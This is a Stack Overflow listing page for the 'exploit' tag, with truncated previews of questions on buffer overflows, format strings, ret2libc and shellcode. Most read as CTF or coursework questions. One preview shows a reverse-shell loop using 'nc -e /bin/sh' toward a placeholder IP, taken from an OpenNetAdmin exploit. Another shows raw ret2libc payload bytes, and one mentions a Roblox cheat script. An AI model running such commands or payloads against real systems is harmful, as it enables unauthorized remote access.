Questions tagged [exploit]

An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch, or vulnerability in order to cause unintended or unanticipated behavior to occur. This frequently includes such things as gaining control of a computer system, allowing privilege escalation, or a denial of service attack.

790 questions

-1

votes

1 answer

Does SMAP/SMEP block allocation in userland (kmalloc)?

I am trying to exploit a heap overflow in Linux kernel with all the protections enable i.e. SMAP and SMEP. What I understand is that SMEP doesn't allow me to execute userland code and SMAP doesn't allow me to read or write to userland. But I am…

linux-kernel kernel exploit

asked Nov 30 '20 at 05:31

user40061

-1

votes

1 answer

Format string attack, convert output to readable format in bash

I'm working on a ctf challenge. This is the relevant code section, void details(){ char name[100]; printf("Please enter your name: "); scanf("%100s", name); printf("Hello %s!\n", name); } If I EOF scanf/stdin, printf will…

c bash printf exploit

asked Sep 07 '20 at 12:44

sven

-1

votes

1 answer

gdb reads wrong input(stdin) values

I input the following in gdb for ret2libc. (gdb) r < <(python -c 'print("\x41"*10 + "\x42"*8 + "\xde\x67\x02\x00\x00\x00\x00\x00" + "\xac\xb1\xf7\f7\xff\x7f\x00\x00" + "\xa0\x08\xe4\xf7\xff\x7f\x00\x00")') The program being debugged has been started…

python c input gdb exploit

asked Jul 04 '20 at 13:51

Kingslayer

-1

votes

2 answers

Bash Syntax Problems for Exploit

I found an exploit at exploit-db for the OpenNetAdmin 18.1.1 I have to adjust this script so it work for me but I don't get this done. This is what I have so far: URL="xxx.xxx.xxx.xxx/ona" while true;do echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx…

linux bash syntax exploit shellcode

asked Jan 27 '20 at 08:51

Soteri

-1

votes

2 answers

Buffer overflow: overrwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following: xor ch, 0 ... cmp dword ptr [ebp+10h],…

gcc assembly x86 buffer-overflow exploit

asked Sep 19 '19 at 09:29

S. L.

-1

votes

1 answer

How do I send raw bytes interactively for a buffer overflow exploit?

I am trying, as part of an exercise, to exploit a simple program by overwriting a value of a variable though a buffer overflow. I am pretty sure I have the idea behind the exploit figured out, but since I am unable to inject my code I can't know for…

c bash stdin buffer-overflow exploit

asked Jan 31 '19 at 20:19

A39-A20

-1

votes

2 answers

Script stops after a few seconds

I have this exploit for Murder Mystery 2. It is a tpcoins and esp exploit. When I enable the tpcoins it will turn off after a few seconds. Is there any way of making it so it stays on? Here's the code: function enableTpCoin() if nameMap ~= "" and…

lua exploit roblox

asked Nov 04 '18 at 07:15

user9954845

-1

votes

1 answer

Ret2libc unexpected output

I can't understand why when I try to exploit a ret2libc I always get this output sh: 1: 34:ln=01: not found sh: 1: 36:mh=00:pi=40: not found sh: 1: 33:so=01: not found sh: 1: 35:do=01: not found sh: 1: 35:bd=40: not found sh: 1: 33: not found ...…

stack exploit

asked May 18 '18 at 23:40

alexsius

-1

votes

1 answer

How to reverse the effects of movl

So when movl (in intel x84-64 machine code) is called and has a register as the destination, it sets the higher order bytes of the register to 0. So how can i use the movl instruction such that I preserve the original value of the register? In this…

assembly x86-64 cpu-registers exploit

asked May 16 '18 at 06:34

Devam Shroff

-1

votes

1 answer

Segmentation Fault during Exploit

I tried to execute a shellcode with buffer overflow. Unfortunately I get a segmentation error. In the following the c code asm code and exploit code: C Code: int main(int argc, char **argv) { char buffer[64]; gets(buffer); } ASM Code: …

segmentation-fault exploit shellcode

asked Apr 14 '18 at 20:58

elguerrero

-1

votes

1 answer

C Windows/Linux Buffer Overflow Exploits

I have looked at how the buffer overflows work and have to determine that the program (with gcc) must compile with the following parameters: -fno-stackprotector and -z execstack. You have to tell the kernel that it does not randomly allocate the…

linux buffer-overflow exploit

asked Jan 31 '18 at 07:00

Emanuel Bennici

-1

votes

1 answer

Why is this the structure of the exploit

So I tried following a tutorial: https://sploitfun.wordpress.com/2015/05/08/classic-stack-based-buffer-overflow/ I was struggling with figuring out the order of the exploit code, atleast in someway. I don't get the reason for first putting NOPS and…

python linux root exploit shellcode

asked Aug 12 '17 at 14:59

Jonathan

-1

votes

1 answer

Buffer-Overflow exploit code

[Buffer - overflow exploit code][1] Hi so i'm doing an exploit on the windows 2000 server as part of an assignment and needed a little help. I've attached a screenshot of the exploit code thats in the c document but i dont really understand what…

windows security buffer-overflow exploit

asked Mar 31 '17 at 15:15

786

-1

votes

1 answer

GDB - see what have accessed the address/break on it

I am trying to overwrite the function vtable: Here it is done: Before memcpy (gdb) x/100x 0xb7993150 0xb7993150: 0xb6eae130 0xb6eae130 0x41414141 0x41414141 0xb7993160: 0x41414141 0x41414141 0x41414141 …

gdb exploit

asked Mar 28 '17 at 19:42

dev

1,119
1
11
34

-1

votes

1 answer

Format String Exploit, unexpected result

I'm trying to implement simple example of Format String Vulnerability in C on 64-bits Linux. Here is my source code: void not_called() { printf("Exploited\n"); } int main(int argc, char **argv) { // Buffer overflow vulnerability char…

c string security unix exploit

asked Apr 05 '16 at 13:51

Tuomas Toivonen

21,690
47
129
225

Prev 1 2 3

…

52 53 Next